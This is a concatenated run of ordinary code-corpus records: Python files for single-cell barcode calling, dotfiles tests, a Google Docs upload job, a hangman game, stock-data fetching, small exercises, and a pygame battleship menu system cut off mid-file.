enumerate(bc_list):\n try:\n dissimilarity[i] = Levenshtein.distance(bc, bc1)\n dissimilarityH[i] = hamming(bc, bc1)\n except TypeError:\n print(bc, bc1)\n sys.exit()\n diss = np.min(dissimilarity)\n dissH = np.min(dissimilarityH)\n ambig = sum(dissimilarity==diss)\n if ambig > 1:\n bc_new = 'AMBIG'\n else:\n bc_new = np.array(bc_list)[dissimilarity==diss][0]\n bc_correction_dic[bc] = (bc_new, diss, dissH, ambig)\n bc = bc_new\n return bc, diss, ambig, bc_correction_dic\n\n def call_cells(self, plot=True):\n \"\"\"call cells using the knee method, returns list of valid cell barcodes.\"\"\"\n # count reads per barcode\n bcs = []\n reads = []\n for i in self.bc_groups.items():\n bcs.append(i[0])\n reads.append(len(i[1]))\n reads, bcs = (list(t) for t in zip(*sorted(zip(reads, bcs), reverse=True)))\n\n # second derivative method (inflection point) of the knee plot to identify cells\n # 1 - first derivative of cell rank plot\n # exclude barcodes with low numbers of reads\n rpc_thresh = [x for x in reads if x >= 100]\n\n x = np.log10(range(1, len(rpc_thresh) + 1))\n y = np.log10(np.array(rpc_thresh))\n\n dy = np.zeros(y.shape, np.float)\n dy[0:-1] = np.diff(y) / np.diff(x)\n dy[-1] = (y[-1] - y[-2]) / (x[-1] - x[-2])\n\n dy = -dy # invert for positive graph\n\n # smooth the data by savgol filtering and call first peak\n try:\n yhat = savgol_filter(dy, int(len(dy)/5), 3) # window size, polynomial order\n except ValueError:\n yhat = savgol_filter(dy, int(len(dy)/5)+1, 3) # window size, polynomial order\n\n # prominence of peak (0.1 should be adequate for most mammalian cell panels)\n prominence = 0.1\n\n peaks = find_peaks(yhat, prominence=prominence)\n max_peak_i = np.argmax(peaks[1]['prominences'])\n max_peak = peaks[0][max_peak_i]\n\n # first n cell barcodes are valid\n n_cells = max_peak #n_cells = int(bin_centers[max_peak])\n self.cell_barcodes = np.sort(bcs[:n_cells])\n\n if plot:\n cells=[]\n\n for i, j in zip(self.bc_groups.values(), self.bc_groups.keys()):\n cells.append(len(i))\n cells = np.array(cells)\n \n fig, (ax1, ax2) = plt.subplots(2,1, figsize=(8,8), sharex=True)\n l1 = ax1.plot(np.sort(cells[cells>5])[::-1])\n ax1.plot([n_cells, n_cells],[300, np.max(cells)], 'k:')\n ax1.set_yscale('log')\n ax1.set_title('read per barcode distribution')\n ax1.set_xlabel('barcode goup rank')\n ax1.set_ylabel('log read per barcode count')\n\n ax2.plot(range(len(yhat)),yhat)\n ax2.set_title('Savitzky-Golay filter smoothed read counts')\n ax2.set_xlabel('barcode goup rank')\n ax2.set_ylabel('dy/dx')\n plt.savefig('qc_output/Cell_calling.png', dpi=600)\n plt.show()\n\n def write_interleaved_fastq(self, output_path, barcodes=False):\n \"\"\"Function to write all the reads from a single cell to an interleaved\n fastq.gz file\"\"\"\n \n if not barcodes:\n barcodes = self.cell_barcodes\n \n file_name_list = []\n for bc in barcodes:\n f_name = bc + '.fastq.gz'\n with gzip.open(os.path.join(output_path, f_name), 'wt') as f:\n for i in self.bc_groups[bc].values():\n f.write('@'+i.idx1+'\\n'+i.seq1+'\\n'+'+\\n'+i.qual1+'\\n')\n f.write('@'+i.idx2+'\\n'+i.seq2+'\\n'+'+\\n'+i.qual2+'\\n')\n file_name_list.append(f_name)\n return file_name_list\n \n def write_r1_fastq(self, output_path, barcodes=False):\n \"\"\"Function to write all rthe reads from a single cell to an interleaved\n fastq.gz file\"\"\"\n \n if not barcodes:\n barcodes = self.cell_barcodes\n \n f_name = 'read1.fastq.gz'\n with gzip.open(os.path.join(output_path, f_name), 'wt') as f:\n for bc in barcodes:\n for i in self.bc_groups[bc].values():\n 
f.write('@'+i.idx1.split()[1]+'_'+bc+'\\n'+i.seq1+'\\n'+'+\\n'+i.qual1+'\\n')\n return\n \n def write_r2_fastq(self, output_path, barcodes=False):\n \"\"\"Function to write all the reads from a single cell to an interleaved\n fastq.gz file\"\"\"\n \n if not barcodes:\n barcodes = self.cell_barcodes\n \n f_name = 'read2.fastq.gz'\n with gzip.open(os.path.join(output_path, f_name), 'wt') as f:\n for bc in barcodes:\n for i in self.bc_groups[bc].values():\n f.write('@'+i.idx2.split()[1]+'_'+bc+'\\n'+i.seq2+'\\n'+'+\\n'+i.qual2+'\\n')\n return\n\n\n","sub_path":"Amplicon/barcode_methods.py","file_name":"barcode_methods.py","file_ext":"py","file_size_in_byte":12503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"476549754","text":"import pytest\nimport py.path\n\nfrom dotfiles.repository import Repository, \\\n DEFAULT_REMOVE_LEADING_DOT, DEFAULT_IGNORE_PATTERNS\nfrom dotfiles.exceptions import NotRootedInHome, InRepository, TargetIgnored, \\\n IsDirectory\n\n\ndef test_repo_create(repo):\n repo.path.remove()\n assert repo.path.check(exists=0)\n Repository(repo.path, repo.homedir)\n assert repo.path.check(exists=1, dir=1)\n\n\n@pytest.mark.parametrize('remove_leading_dot',\n [DEFAULT_REMOVE_LEADING_DOT,\n not DEFAULT_REMOVE_LEADING_DOT])\n@pytest.mark.parametrize('ignore_patterns', [DEFAULT_IGNORE_PATTERNS,\n ['foo', 'bar', 'baz']])\ndef test_repo_params(repo, remove_leading_dot, ignore_patterns):\n _repo = Repository(repo.path,\n remove_leading_dot=remove_leading_dot,\n ignore_patterns=ignore_patterns,\n homedir=repo.homedir)\n assert _repo.path == repo.path\n assert _repo.homedir == repo.homedir\n assert _repo.remove_leading_dot == remove_leading_dot\n assert _repo.ignore_patterns == ignore_patterns\n\n\ndef test_str(repo):\n repo.path.ensure('a')\n repo.path.ensure('b')\n repo.path.ensure('c')\n assert str(repo) == (\n '%s\\n%s\\n%s' % (repo.homedir.join('.a'),\n repo.homedir.join('.b'),\n repo.homedir.join('.c')))\n\n\n@pytest.mark.parametrize('path', ['.foo', '.foo/bar/baz'])\ndef test_dotfile_path(repo, path):\n repo.remove_leading_dot = False\n assert (repo._dotfile_path(repo.path.join(path)) ==\n repo.homedir.join(path))\n repo.remove_leading_dot = True\n assert (repo._dotfile_path(repo.path.join(path)) ==\n repo.homedir.join('.%s' % path))\n\n\n@pytest.mark.parametrize('path', ['.foo', '.foo/bar/baz'])\ndef test_dotfile_target(repo, path):\n repo.remove_leading_dot = False\n assert (repo._dotfile_target(repo.homedir.join(path)) ==\n repo.path.join(path))\n repo.remove_leading_dot = True\n assert (repo._dotfile_target(repo.homedir.join(path)) ==\n repo.path.join(path[1:]))\n\n\ndef test_dotfile(repo):\n with pytest.raises(NotRootedInHome):\n repo._dotfile(py.path.local('/tmp/foo'))\n with pytest.raises(TargetIgnored):\n repo.ignore_patterns = ['.foo']\n repo.remove_leading_dot = False\n repo._dotfile(py.path.local(repo.homedir.join('.foo')))\n with pytest.raises(TargetIgnored):\n repo.ignore_patterns = ['foo']\n repo._dotfile(repo.homedir.join('.bar/foo'))\n with pytest.raises(IsDirectory):\n repo._dotfile(repo.homedir.ensure_dir('.config'))\n\n # The repo fixture is parametrized, we can only expect InRepository\n # exception when the repository is contained in the home directory.\n if repo.path.dirname == repo.homedir.basename:\n with pytest.raises(InRepository):\n repo._dotfile(repo.path.join('.foo/bar'))\n\n repo._dotfile(repo.homedir.join('.foo'))\n\n\ndef test_dotfiles(repo):\n file = repo.homedir.join('.baz')\n dir = 
repo.homedir.ensure_dir('.dir')\n dir.ensure('foo/bat')\n dir.ensure('foo/buz')\n dir.ensure('bar')\n dir.ensure('boo')\n\n dotfiles = repo.dotfiles([str(file), str(dir)])\n assert len(dotfiles) == 5\n\n\ndef test_contents(repo):\n assert repo.contents() == []\n\n target_a = repo.path.ensure('a')\n target_b = repo.path.ensure('b/b')\n target_c = repo.path.ensure('c/c/c')\n contents = repo.contents()\n\n assert contents[0].target == target_a\n assert contents[1].target == target_b\n assert contents[2].target == target_c\n\n\ndef test_prune(repo):\n repo.path.ensure_dir('.a/a')\n repo.path.ensure_dir('.b/b/b/b')\n repo.path.ensure_dir('.c/c/c/c/c/c/c/c')\n\n repo.prune()\n assert len(repo.path.listdir()) == 0\n","sub_path":"tests/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"7256478","text":"import json\nimport os\nimport tempfile\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.http import MediaFileUpload\nfrom oauth2client.client import GoogleCredentials\nfrom typing import List\n\nfrom jobs.convert import Convert\n\n\ndef push_gdoc(paths: List[str], project: str, source: dict):\n \"\"\"\n Push google doc using given user token\n \"\"\"\n assert \"doc_id\" in source, \"source must have a doc_id\"\n assert \"token\" in source, \"source must include a token\"\n assert len(paths) == 1, \"paths must contain exactly one item\"\n\n docx = tempfile.NamedTemporaryFile(delete=False)\n convert = Convert()\n current = {}\n\n def update_state(state, meta):\n current[\"state\"] = state\n current[\"meta\"] = meta\n\n convert.update_state = update_state\n json_file = os.path.join(project, paths[0])\n\n convert.run(json_file, docx.name, {\"from\": \"gdoc\", \"to\": \"docx\"})\n\n credentials = GoogleCredentials(\n source[\"token\"], None, None, None, None, None, \"Stencila Hub Client\",\n )\n drive_service = build(\"drive\", \"v3\", credentials=credentials, cache_discovery=False)\n files_resource = drive_service.files()\n\n media = MediaFileUpload(docx.name)\n files_resource.update(fileId=source[\"doc_id\"], media_body=media).execute()\n\n os.unlink(docx.name)\n","sub_path":"worker/jobs/push/gdoc.py","file_name":"gdoc.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"156481496","text":"import random # this statement imports a library from the internet. \npalavras = [] # this statement creates a list.\n\n\n\nletrasErradas = ''# this statement creates a variable, which is like a list with only one value.\nletrasCertas = ''\nFORCAIMG = ['''\n \n +---+\n | |\n |\n |\n |\n |\n=========''','''\n \n +---+\n | |\n O |\n |\n |\n |\n=========''','''\n \n +---+\n | |\n O |\n | |\n |\n |\n=========''','''\n \n +---+\n | |\n O |\n /| |\n |\n |\n=========''','''\n \n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========''','''\n \n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========''','''\n \n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========''']\n\ndef inserir (): # collect the words that the person types.\n while True:\n x= input(\"Digite a palavra: \")\n palavras.append(x)\n if x == \"\": # if the variable x is empty the game stops asking for words\n break\ndef principal(): # the def statement is used in Python to \"create\" functions.\n \"\"\"\n Main function of the program\n \"\"\"\n print('F O R C A') # prints the given message on the screen.\n inserir ()\n palavraSecreta = sortearPalavra()\n palpite = ''\n desenhaJogo(palavraSecreta,palpite)\n\n while True: # runs the block while the condition is true.\n palpite = receberPalpite() \n desenhaJogo(palavraSecreta,palpite)\n if perdeuJogo(): # this statement means \"if\"; it runs the block when its condition is true.\n print('Voce Perdeu!!!')\n break # stops running the block when the condition is true or false, depending on your if.\n if ganhouJogo(palavraSecreta):\n print('Voce Ganhou!!!')\n break \n \ndef perdeuJogo():\n global FORCAIMG # this statement marks the name as global rather than local; it pulls in a variable defined outside the block.\n if len(letrasErradas) == len(FORCAIMG): \n return True \n else:\n return False \n \ndef ganhouJogo(palavraSecreta):\n global letrasCertas\n ganhou = True\n for letra in palavraSecreta: # the for statement in Python creates a loop; it walks through a sequence in order, updating the variables you specify.\n if letra not in letrasCertas:\n ganhou = False \n return ganhou \n \n\n\ndef receberPalpite():\n \n palpite = input(\"Adivinhe uma letra: \")\n palpite = palpite.upper()\n if len(palpite) != 1: # len returns the size of the list.\n print('Coloque um unica letra.')\n elif palpite in letrasCertas or palpite in letrasErradas: # elif means \"else, if this condition is true\".\n print('Voce ja disse esta letra.')\n elif not \"A\" <= palpite <= \"Z\": # if the guess is not between A and Z it prints \"please choose letters only\" on the screen.\n print('Por favor escolha apenas letras')\n else: # this branch runs if the if is false.\n return palpite # return defines what comes back when you call the function.\n \n \ndef desenhaJogo(palavraSecreta,palpite): \n global letrasCertas\n global letrasErradas\n global FORCAIMG\n\n print(FORCAIMG[len(letrasErradas)])\n \n \n vazio = len(palavraSecreta)*'-'\n \n if palpite in palavraSecreta: \n letrasCertas += palpite\n else:\n letrasErradas += palpite \n\n for letra in letrasCertas:\n for x in range(len(palavraSecreta)):\n if letra == palavraSecreta[x]:\n vazio = vazio[:x] + letra + vazio[x+1:]\n \n print('Acertos: ',letrasCertas )\n print('Erros: ',letrasErradas)\n print(vazio)\n \n\ndef sortearPalavra(): # this function takes all the words in the word list and returns a random one.\n global palavras\n return random.choice(palavras).upper()\n\n 
\nprincipal()\n","sub_path":"adila-forca.py","file_name":"adila-forca.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"519901119","text":"# Big-O analysis\n# Time Complexity: O(n^2)\n# Space Complexity: O(n)\n\n# the space complexity is O(N) because the recursive function grows linearly\n# relative to the input. e.g:\n# f(O) = 0\n# f(1) = 0\n# f(2) = 1\n\ndef countdown_recursive(n):\n if n == 0: # n operations\n print(\"Blast off\") # 1 operation\n else:\n print(n) # 1 operation\n countdown_recursive(n - 1) # n operations\n# 1 + 1 + n * n\n# 2 + n**2\n","sub_path":"Adrian-Francis/Big-O-Notation/CountDown-Recursive/count_down_recursive.py","file_name":"count_down_recursive.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"652567823","text":"#!/usr/bin/env python\n\nimport sys\nimport csv\nimport Queue\nimport threading\nimport ystockquote as ys\n\n\ndef gen_info_list(tickers, start, end):\n '''\n Given a list of ticker symbols, a start date, and an end date, return a\n list of dictionaries containing the information.\n '''\n return [{'symbol': ticker, \\\n 'start': start, \\\n 'end': end} \\\n for ticker in tickers]\n\nclass FetcherThread(threading.Thread):\n\n def __init__(self, in_queue, out_queue):\n threading.Thread.__init__(self)\n self.in_queue = in_queue\n self.out_queue = out_queue\n\n def run(self):\n while True:\n spec = self.in_queue.get()\n data = ys.get_historical_prices(spec['symbol'], spec['start'], spec['end'])\n spec.update({'data': data})\n\n # Emit a new dictionary equivalent to spec but with a new key 'data'\n # containing the price data.\n self.out_queue.put(spec)\n self.in_queue.task_done()\n\n\nclass WriterThread(threading.Thread):\n '''\n A class to perform concurrent writes to the file system.\n '''\n\n def __init__(self, queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def __decorate(self, symbol, start, end):\n return '_'.join([symbol, start, end]) + '.csv'\n\n def run(self):\n while True:\n spec = self.queue.get()\n filename = spec['symbol']\n with open(filename, 'wb') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n writer.writerows(spec['data'])\n self.queue.task_done()\n\ndef main():\n with open('tickers.txt') as tickersFile:\n tickers = tickersFile.readlines()\n start_date = '20000101'\n end_date = '20170206'\n in_queue = Queue.Queue()\n out_queue = Queue.Queue()\n\n # Populate the in_queue with data\n for symbol in tickers:\n symbol = symbol.strip(\"\\n\")\n packet = {'symbol': symbol, 'start': start_date, 'end': end_date}\n in_queue.put(packet)\n\n # Spawn a pool of fetcher threads\n for i in range(4):\n t = FetcherThread(in_queue, out_queue)\n t.setDaemon(True)\n t.start()\n\n for i in range(4):\n w = WriterThread(out_queue)\n w.setDaemon(True)\n w.start()\n\n # Wait on the queues until everything has been processed\n in_queue.join()\n out_queue.join()\n\n\nif __name__ == '__main__':\n main()","sub_path":"dataScript/YahooDataGrabber.py","file_name":"YahooDataGrabber.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"525206681","text":"my_file = open(\"encoded_zen_lines.txt\", \"r\")\nout_file = open(\"decoded_zen_lines.txt\", \"w\")\nlines = my_file.readlines()\n\nfor line in lines:\n words 
= line.split(\" \")\n decoded_line = []\n for word in words:\n decoded_word = \"\"\n for char in word:\n decoded_word += chr(ord(char)-1)\n decoded_line.append(decoded_word)\n print(\" \".join(decoded_line))\n out_file.write(\" \".join(decoded_line) + \"\\n\")\nmy_file.close()\nout_file.close()\n","sub_path":"week-4/tue/decoded.py","file_name":"decoded.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"127339066","text":"import re\n\ndef censor(input):\n pattern = re.compile(r'frack\\w*', re.I)\n result = pattern.sub(\"CENSORED\", input)\n\n return result\n\nprint( censor('Frack you') )\nprint( censor('I hope you fracking die') )\nprint( censor('you fracking frack') )\n","sub_path":"tutorial/bootcamp/reg-exp/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"281616001","text":"#!/usr/bin/env python\nimport random\nfrom dominion.CardPile import CardPile\n\n\n###############################################################################\nclass RuinCardPile(CardPile):\n def __init__(self, game, pile_size):\n self.mapping = game.get_card_classes(\"RuinCard\", game.paths[\"cards\"], \"Card_\")\n super().__init__(cardname=\"Ruins\", klass=None, game=game, pile_size=pile_size)\n\n def init_cards(self):\n for _ in range(self.pile_size):\n c = random.choice(list(self.mapping.keys()))\n self._cards.append(self.mapping[c]())\n\n\n# EOF\n","sub_path":"dominion/RuinCardPile.py","file_name":"RuinCardPile.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"297715499","text":"from datetime import datetime\n\nfrom nose.tools import eq_\n\nimport amo.tests\nfrom mkt.constants import apps\nfrom mkt.site.fixtures import fixture\nfrom mkt.stats import search\nfrom mkt.webapps.models import Installed\nfrom users.models import UserProfile\n\n\nclass InstalledTests(amo.tests.TestCase):\n fixtures = fixture('user_999')\n\n def setUp(self):\n self.user = UserProfile.objects.get(username='regularuser')\n self.first_app = amo.tests.app_factory(name='public',\n app_slug='pub', type=1, status=4, public_stats=True)\n self.second_app = amo.tests.app_factory(name='private',\n app_slug='priv', type=1, status=4, public_stats=False)\n\n def test_no_installs(self):\n data = {'created': datetime.now(),\n 'addon': self.first_app.id}\n result = search.get_installed_daily(data)\n eq_(result['date'], data['created'].date())\n eq_(result['addon'], data['addon'])\n eq_(result['count'], 0)\n\n def test_only_one_app(self):\n Installed.objects.create(addon=self.first_app, user=self.user,\n install_type=apps.INSTALL_TYPE_USER)\n data = {'created': datetime.now(),\n 'addon': self.first_app.id}\n result = search.get_installed_daily(data)\n eq_(result['date'], data['created'].date())\n eq_(result['addon'], data['addon'])\n eq_(result['count'], 1)\n\n def test_multiple_installs(self):\n # Due to the unique together we use different install types to deal\n # with that constraint.\n Installed.objects.create(addon=self.first_app, user=self.user,\n install_type=apps.INSTALL_TYPE_USER)\n Installed.objects.create(addon=self.first_app, user=self.user,\n install_type=apps.INSTALL_TYPE_DEVELOPER)\n data = {'created': datetime.now(),\n 'addon': self.first_app.id}\n result = search.get_installed_daily(data)\n eq_(result['date'], 
data['created'].date())\n eq_(result['addon'], data['addon'])\n eq_(result['count'], 2)\n\n def test_two_apps(self):\n Installed.objects.create(addon=self.first_app, user=self.user,\n install_type=apps.INSTALL_TYPE_USER)\n Installed.objects.create(addon=self.second_app, user=self.user,\n install_type=apps.INSTALL_TYPE_USER)\n data = {'created': datetime.now(),\n 'addon': self.first_app.id}\n result = search.get_installed_daily(data)\n eq_(result['date'], data['created'].date())\n eq_(result['addon'], data['addon'])\n eq_(result['count'], 1)\n","sub_path":"mkt/stats/tests/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"413525277","text":"\"\"\"\nGiven an integer array nums, find a contiguous non-empty subarray within the array that has the largest product, and return the product.\n\nIt is guaranteed that the answer will fit in a 32-bit integer.\n\nA subarray is a contiguous subsequence of the array.\n\n\n\nExample 1:\n\nInput: nums = [2,3,-2,4]\nOutput: 6\nExplanation: [2,3] has the largest product 6.\nExample 2:\n\nInput: nums = [-2,0,-1]\nOutput: 0\nExplanation: The result cannot be 2, because [-2,-1] is not a subarray.\n\n\nConstraints:\n\n1 <= nums.length <= 2 * 104\n-10 <= nums[i] <= 10\nThe product of any prefix or suffix of nums is guaranteed to fit in a 32-bit integer.\n\"\"\"\n\nimport math\n\n\ndef max_product(a):\n n = len(a)\n if n == 0:\n return 0\n res = -math.inf\n product_from_front = 1\n product_from_back = 1\n for i in range(n):\n product_from_front *= a[i]\n product_from_back *= a[n - 1 - i]\n res = max(res, product_from_front, product_from_back)\n if not product_from_front:\n product_from_front = 1\n if not product_from_back:\n product_from_back = 1\n return res\n\n\nif __name__ == \"__main__\":\n # array = [2, 3, -2, 4]\n array = [-2, 3, -4]\n\n print(max_product(array))\n print(array)\n","sub_path":"DSA/leetcodepractice/array/152_Maximum_Product_Subarray.py","file_name":"152_Maximum_Product_Subarray.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"564645767","text":"import pygame\nimport ship\nimport menu\nimport settings\nimport grid\nimport networking.client\nimport networking.server\nimport random\nfrom networking.packet import Packet\nimport color\nfrom crosshair import Crosshair\nfrom hitmarker import Hitmarker\nfrom missmarker import Missmarker\n# Initialize fonts\ntitle_font = pygame.freetype.SysFont(\"monospace\", 70)\ntitle_font.pad = True\ntitle_font.strong = True\nfont = pygame.freetype.SysFont(\"Helvetica\", 50)\nfont.pad = True\nmono_font = pygame.freetype.SysFont(\"monospace\", 50)\nmono_font.pad = True\nstatus_font = pygame.freetype.SysFont(\"Helvetica\", 20)\n\nsettings = settings.Settings()\n# TODO: Should these be in constants or settings file???\n# Set the window settings\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 700\n\nclass SceneHandler():\n def __init__(self, start_scene, *args):\n self.scene = None\n # Set the scene to start scene\n self.switch(start_scene, *args)\n\n def switch(self, dest, *args):\n if dest == Scene.MAIN_MENU:\n self.scene = MainMenu(self, *args)\n elif dest == Scene.HOST_MENU:\n self.scene = HostMenu(self, *args)\n elif dest == Scene.WAIT_HOST_MENU:\n self.scene = WaitHostMenu(self, *args)\n elif dest == Scene.CONNECT_MENU:\n self.scene = ConnectMenu(self, *args)\n elif dest == 
Scene.WAIT_CONNECT_MENU:\n self.scene = WaitConnectMenu(self, *args)\n elif dest == Scene.PLACEMENT:\n self.scene = Placement(self, *args)\n elif dest == Scene.CLASH:\n self.scene = Clash(self, *args)\n elif dest == Scene.END:\n self.scene = End(self, *args)\n elif dest == Scene.CONNECTION_CLOSED:\n self.scene = ConnectionClosedMenu(self, *args)\n\nclass Scene():\n MAIN_MENU = 1\n HOST_MENU = 2\n WAIT_HOST_MENU = 3\n CONNECT_MENU = 4\n WAIT_CONNECT_MENU = 5\n PLACEMENT = 6\n CLASH = 7\n END = 8\n CONNECTION_CLOSED = 9\n\n def __init__(self):\n raise NotImplementedError\n\n def check_events(self):\n raise NotImplementedError\n\n def do_logic(self):\n raise NotImplementedError\n\n def draw(self):\n raise NotImplementedError\n\nclass MainMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen):\n self.scene_handler = scene_handler\n # Get center of the screen\n center = screen.get_rect().center\n # Create labels\n self.title = menu.Label(\"MAIN\", title_font, color.BLACK, color.GREY)\n self.title.rect.center = center\n self.title.rect.y = 50\n # Create buttons\n self.host_btn = menu.Button(\"Host a server\", font)\n self.host_btn.rect.center = center\n self.host_btn.rect.y -= 75\n self.connect_btn = menu.Button(\"Connect to a server\", font)\n self.connect_btn.rect.center = center\n self.exit_btn = menu.Button(\"Exit\", font)\n self.exit_btn.rect.center = center\n self.exit_btn.rect.y += 100\n self.test_btn = menu.Button(\"TEST\", font)\n self.test_btn.rect.center = center\n self.test_btn.rect.y += 200\n buttons = [self.host_btn, self.connect_btn, self.exit_btn, self.test_btn]\n # Pass created components to the menu base class\n menu.Menu.__init__(self, screen, [self.title], buttons)\n\n def check_events(self):\n selected = self.check_menu_events()\n if selected == self.exit_btn or selected == -1:\n exit()\n elif selected == self.host_btn:\n self.scene_handler.switch(Scene.HOST_MENU, self.screen, \"localhost\", 7777)\n elif selected == self.connect_btn:\n self.scene_handler.switch(Scene.CONNECT_MENU, self.screen, \"localhost\", 7777)\n elif selected == self.test_btn:\n self.scene_handler.switch(Scene.PLACEMENT, self.screen, settings, None)\n\n def do_logic(self):\n pass\n \n def draw(self):\n self.screen.fill(color.GREY)\n self.draw_components()\n\nclass HostMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen, ip=None, port=None):\n self.scene_handler = scene_handler\n if ip == None:\n self.ip = \"IP Address\"\n else:\n self.ip = ip\n if port == None:\n self.port = \"Port\"\n else:\n self.port = port\n center = screen.get_rect().center\n # Create labels\n self.title = menu.Label(\"HOST A SERVER\", title_font, color.BLACK, color.GREY)\n self.title.rect.center = center\n self.title.rect.y = 50\n # Create buttons for the menu\n self.settings_btn = menu.Button(\"Settings\", font, color.BLACK, color.GREY)\n self.settings_btn.rect.center = center\n self.start_btn = menu.Button(\"Start the server\", font, color.BLACK, color.GREY)\n self.start_btn.rect.center = center\n self.start_btn.rect.y += 75\n self.back_btn = menu.Button(\"Back\", font, color.BLACK, color.GREY)\n self.back_btn.rect.center = center\n self.back_btn.rect.y += 175\n # Create text boxes\n self.ip_box = menu.TextBox(self.ip, mono_font, 15, color.BLACK, color.WHITE, None)\n self.ip_box.rect.center = center\n self.ip_box.rect.y -= 150\n self.port_box = menu.TextBox(str(self.port), mono_font, 15, color.BLACK, color.WHITE, None)\n self.port_box.rect.center = center\n self.port_box.rect.y -= 75\n selectables = 
[self.ip_box, self.port_box, self.settings_btn, self.start_btn, self.back_btn]\n # Create the menu and draw it\n menu.Menu.__init__(self, screen, [self.title], selectables)\n\n def check_events(self):\n selected = self.check_menu_events()\n if selected == self.back_btn or selected == -1:\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n elif selected == self.settings_btn: # settings\n print(\"Settings menu.\")\n elif selected == self.start_btn: # start server\n ip = self.ip_box.get_text()\n port = int(self.port_box.get_text())\n self.scene_handler.switch(Scene.WAIT_HOST_MENU, self.screen, ip, port)\n \n def do_logic(self):\n pass\n\n def draw(self):\n self.draw_components()\n\nclass WaitHostMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen, ip, port):\n self.scene_handler = scene_handler\n self.ip = ip\n self.port = port\n center = screen.get_rect().center\n self.title = menu.Label(\"Waiting for a client...\", font, color.BLACK, color.BLUE_GREY)\n self.title.rect.center = center\n self.title.rect.y = 150\n self.cancel_btn = menu.Button(\"Cancel\", font, color.BLACK, color.BLUE_GREY)\n self.cancel_btn.rect.center = center\n self.cancel_btn.rect.y = 400\n popup_offset_x = 100\n popup_offset_y = 100\n pop_rect = pygame.Rect(popup_offset_x, popup_offset_y, SCREEN_WIDTH - popup_offset_x * 2, SCREEN_HEIGHT - popup_offset_y * 2)\n menu.Menu.__init__(self, screen, [self.title], [self.cancel_btn], pop_rect, color.BLUE_GREY)\n # Create the connection\n self.connection = networking.server.Server()\n server_thread = self.connection.create(ip, port)\n server_thread.start()\n\n def check_events(self):\n selected = self.check_menu_events()\n if selected != None:\n # Stop the connection effort\n self.connection.close()\n self.scene_handler.switch(Scene.HOST_MENU, self.screen, self.ip, self.port)\n\n def do_logic(self):\n if self.connection.connected:\n self.scene_handler.switch(Scene.PLACEMENT, self.screen, settings, self.connection)\n \n def draw(self):\n self.draw_components()\n pass\n \nclass ConnectMenu(Scene, menu.Menu):\n def __init__(self, scene_handler, screen, ip=None, port=None):\n self.scene_handler = scene_handler\n if ip == None:\n self.ip = \"Ip Address\"\n else:\n self.ip = ip\n if port == None:\n self.port = \"Port\"\n else:\n self.port = port\n center = screen.get_rect().center\n # Create a title\n self.title = menu.Label(\"CONNECT\", title_font, color.BLACK, color.GREY)\n self.title.rect.center = center\n self.title.rect.y = 50\n # Create buttons for the menu\n self.connect_btn = menu.Button(\"Connect\", font, color.BLACK, color.GREY)\n self.connect_btn.rect.center = center\n self.back_btn = menu.Button(\"Back\", font, color.BLACK, color.GREY)\n self.back_btn.rect.center = center\n self.back_btn.rect.y += 100\n # Create text boxes\n self.ip_box = menu.TextBox(self.ip, mono_font, 15, color.BLACK, color.WHITE, None)\n self.ip_box.rect.center = center\n self.ip_box.rect.y -= 150\n self.port_box = menu.TextBox(str(self.port), mono_font, 15, color.BLACK, color.WHITE, None)\n self.port_box.rect.center = center\n self.port_box.rect.y -= 75\n selectables = [self.ip_box, self.port_box, self.connect_btn, self.back_btn]\n # Create the menu and draw it\n menu.Menu.__init__(self, screen, [self.title], selectables)\n\n def check_events(self):\n selected = self.check_menu_events()\n if selected == self.back_btn or selected == -1:\n self.scene_handler.switch(Scene.MAIN_MENU, self.screen)\n elif selected == self.connect_btn:\n ip = self.ip_box.get_text()\n port = 
